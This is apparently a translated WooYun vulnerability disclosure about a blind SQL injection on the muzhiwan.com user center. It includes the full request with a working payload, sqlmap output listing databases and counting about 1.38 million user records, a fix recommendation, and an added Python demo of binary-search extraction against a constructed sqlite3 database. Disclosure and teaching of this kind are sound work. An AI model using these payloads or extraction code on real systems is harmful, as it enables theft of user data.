
Vulnerability summary

Defect ID: wooyun-2015-0147726

Title: SQL injection on the muzhiwan main site affects millions of user records

Vendor: muzhiwan.com

Author: 路人甲

Submitted: 2015-10-19 11:57

Fixed: 2015-12-03 12:02

Published: 2015-12-03 12:02

Type: SQL injection

Severity: High

Self-assessed Rank: 18

Status: Confirmed by vendor

Source: http://www.wooyun.org; for questions or help contact [email protected]



Vulnerability details

Disclosure status:

2015-10-19: Details sent to the vendor, awaiting vendor response
2015-10-19: Confirmed by vendor, details disclosed to the vendor only
2015-10-29: Details disclosed to core white hats and domain experts
2015-11-08: Details disclosed to regular white hats
2015-11-18: Details disclosed to intern white hats
2015-12-03: Details disclosed to the public

Summary:

SQL injection on the muzhiwan main site affects millions of user records

Details:

The injection point is the "change phone model" form in the main site's user center. The brandname parameter of the following request is injectable:

POST /index.php?action=profile&opt=Model HTTP/1.1
Host: u.muzhiwan.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:18.0) Gecko/20100101 Firefox/18.0
Accept: */*
Accept-Language: zh-cn,zh;q=0.8,en-us;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Referer: http://u.muzhiwan.com/index.php?action=profile&opt=Model
Content-Length: 89
Cookie: __utma=203078925.498
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache
brandname=5-if(1=1 AND length(database())=3,0,(select 1 union select 2))&productname=1193


MySQL boolean-based blind injection. brandname is used in a numeric context, so no quote is needed: when the IF() condition holds the expression evaluates to 5 and the update succeeds; when it does not, the ELSE branch runs the multi-row subquery (select 1 union select 2) and MySQL aborts the statement with "Subquery returns more than 1 row". The success-or-error response therefore leaks one bit per request, which is enough to read out the whole database.

Proof of concept:

sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: (custom) POST
Parameter: #1*
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: type=album&aid=1 or 1=1-if(1=1 AND 4174=4174 ,0,(select 1 union select 2))
---
[03:12:54] [INFO] testing MySQL
[03:12:54] [INFO] confirming MySQL
[03:12:54] [INFO] the back-end DBMS is MySQL
web application technology: PHP 5.2.14
back-end DBMS: MySQL >= 5.0.0
[03:12:54] [INFO] fetching database names
[03:12:54] [INFO] fetching number of databases
[03:12:54] [INFO] resumed: 25
[03:12:54] [INFO] resumed: information_schema
[03:12:54] [INFO] resumed: anquanxia
[03:12:54] [INFO] resumed: applanet_user
[03:12:54] [INFO] resumed: bug
[03:12:54] [INFO] resumed: googleinstall
[03:12:54] [INFO] resumed: googlemarket
[03:12:54] [INFO] resumed: googlemarketgame
[03:12:54] [INFO] resumed: muzhiwan
[03:12:54] [INFO] resumed: muzhiwan130409
[03:12:54] [INFO] resumed: muzhiwan130417
[03:12:54] [INFO] resumed: muzhiwanbbs
[03:12:54] [INFO] resumed: muzhiwanbbstest
[03:12:54] [INFO] resumed: muzhiwantest
[03:12:54] [INFO] resumed: mysql
[03:12:54] [INFO] resumed: mzw
[03:12:54] [INFO] resumed: mzw_new_gz
[03:12:54] [INFO] resumed: mzw_oa
[03:12:54] [INFO] resumed: mzwtest
[03:12:54] [INFO] resumed: redmine
[03:12:54] [INFO] resumed: sdk
[03:12:54] [INFO] resumed: stat
[03:12:54] [INFO] resumed: stat_sdk
[03:12:54] [INFO] resumed: test
[03:12:54] [INFO] resumed: testlink
[03:12:54] [INFO] resumed: wikidatabase
available databases [25]:
[*] anquanxia
[*] applanet_user
[*] bug
[*] googleinstall
[*] googlemarket
[*] googlemarketgame
[*] information_schema
[*] muzhiwan
[*] muzhiwan130409
[*] muzhiwan130417
[*] muzhiwanbbs
[*] muzhiwanbbstest
[*] muzhiwantest
[*] mysql
[*] mzw
[*] mzw_new_gz
[*] mzw_oa
[*] mzwtest
[*] redmine
[*] sdk
[*] stat
[*] stat_sdk
[*] test
[*] testlink
[*] wikidatabase
Root privileges, it seems: every database appears to be reachable from this account.
Now the user table:
sql-shell> select count(*) from muzhiwanbbs.pre_ucenter_members
[03:05:24] [INFO] fetching SQL SELECT statement query output: 'select count(*) from muzhiwanbbs.pre_ucenter_members'
[03:05:24] [WARNING] running in a single-thread mode. Please consider usage of option '--threads' for faster data retrieval
[03:05:24] [INFO] retrieved: 1386124
select count(*) from muzhiwanbbs.pre_ucenter_members: '1386124'
sql-shell> select count(*) from mzw.mzw_users
About 1.38 million (1,386,124) forum user records affected.

Fix:

You know the drill: bind brandname and productname as query parameters instead of splicing them into the SQL text, and, since the account appears to have root privileges, connect the web application with a least-privilege database user that can only reach its own schema.
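The script below is an added example, not code from this report or from muzhiwan.com. It rebuilds the technique end to end on a constructed sqlite3 database so it runs offline: a vulnerable handler that splices brandname into an UPDATE the way the request above implies, an oracle that only sees "request succeeded" or "database error", the binary-search extraction that sqlmap automated (extract_int mirrors the count(*) query in the proof section, extract_str mirrors the length(database())=3 probe in the payload), and the parameterized handler from the fix. Because sqlite3 has no IF() and tolerates a multi-row scalar subquery, the stand-in for MySQL's if(cond, 0, (select 1 union select 2)) is a CASE whose ELSE branch calls abs() on the smallest 64-bit integer, which sqlite documents as raising "integer overflow". The schema, the 1386-row members table and the table name are all constructed for the demo.

```python
"""Boolean-blind SQL injection end to end, against a constructed sqlite3 stand-in
for the profile "phone model" update on the page (not the site's real code)."""
import sqlite3

# MySQL payload from the report:  5-if(<cond>, 0, (select 1 union select 2))
# evaluates to 5 when <cond> holds and raises "Subquery returns more than 1 row"
# otherwise, so the HTTP response reveals one bit per request.
# sqlite3 has no IF() and tolerates multi-row scalar subqueries, so the stand-in
# below errors through abs(-9223372036854775808), which sqlite documents as an
# "integer overflow" error; the "- (SELECT 1)" keeps the branch non-constant so
# the planner cannot pre-evaluate it outside the CASE.
ORACLE_PAYLOAD = ("5-(CASE WHEN ({cond}) THEN 0 "
                  "ELSE abs(-9223372036854775807 - (SELECT 1)) END)")


def make_db(n_members):
    """Constructed schema: one profile row to update and a members table to leak."""
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE profile(uid INTEGER PRIMARY KEY, brandname, productname TEXT);
        INSERT INTO profile VALUES (1, 0, '0');
        CREATE TABLE members(uid INTEGER PRIMARY KEY, username TEXT);
    """)
    conn.executemany("INSERT INTO members(username) VALUES (?)",
                     [(f"user{i}",) for i in range(n_members)])
    return conn


def update_model_vulnerable(conn, uid, brandname, productname):
    # The bug on the page: request parameters are spliced into the SQL text,
    # and brandname sits in a numeric context, so no quote is even needed.
    conn.execute(f"UPDATE profile SET brandname = {brandname}, "
                 f"productname = '{productname}' WHERE uid = {uid}")


def update_model_safe(conn, uid, brandname, productname):
    # The fix: bind parameters; values never become part of the statement.
    conn.execute("UPDATE profile SET brandname = ?, productname = ? WHERE uid = ?",
                 (brandname, productname, uid))


def make_oracle(conn, handler):
    """Return ask(cond) -> True if the request succeeded, False if the DB errored,
    which is all the attacker observes (success page vs. error page)."""
    def ask(cond):
        try:
            handler(conn, 1, ORACLE_PAYLOAD.format(cond=cond), "1193")
            return True
        except sqlite3.OperationalError:
            return False
    return ask


def extract_int(ask, expr, lo=0, hi=2**31):
    """Binary-search the value of an integer SQL expression (about 31 requests)."""
    while lo < hi:
        mid = (lo + hi) // 2
        if ask(f"({expr}) > {mid}"):
            lo = mid + 1
        else:
            hi = mid
    return lo


def extract_str(ask, expr):
    """Recover a string: its length first (cf. length(database())=3 in the
    report's payload), then each character by code point."""
    n = extract_int(ask, f"length({expr})", 0, 256)
    return "".join(
        chr(extract_int(ask, f"unicode(substr({expr}, {i}, 1))", 0, 0x110000))
        for i in range(1, n + 1))


def demo(n_members=1386):
    conn = make_db(n_members)
    ask = make_oracle(conn, update_model_vulnerable)
    count = extract_int(ask, "SELECT count(*) FROM members")
    table = extract_str(ask, "(SELECT name FROM sqlite_master "
                             "WHERE type='table' ORDER BY name LIMIT 1)")
    # Same probes through the parameterized handler: every request "succeeds"
    # because the payload is stored as a literal string, so the search learns
    # nothing and runs off the top of its range.
    ask_safe = make_oracle(conn, update_model_safe)
    blind = extract_int(ask_safe, "SELECT count(*) FROM members")
    stored = conn.execute("SELECT brandname FROM profile WHERE uid = 1").fetchone()[0]
    return count, table, blind, stored


if __name__ == "__main__":
    print(demo())
```

demo() returns the leaked row count (1386) and the first table name ("members") recovered through the vulnerable handler, then 2147483648 for the same count probe against the parameterized handler, whose profile row now simply holds the payload text as its brand name: the oracle is gone because the injected expression is never evaluated as SQL.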

Copyright notice: please credit 路人甲@乌云 when reposting.


Vulnerability response

Vendor response:

Severity: High

Vulnerability Rank: 20

Confirmed: 2015-10-19 12:00

Vendor reply:

Thanks, we will fix it as soon as possible.

Latest status:

None yet

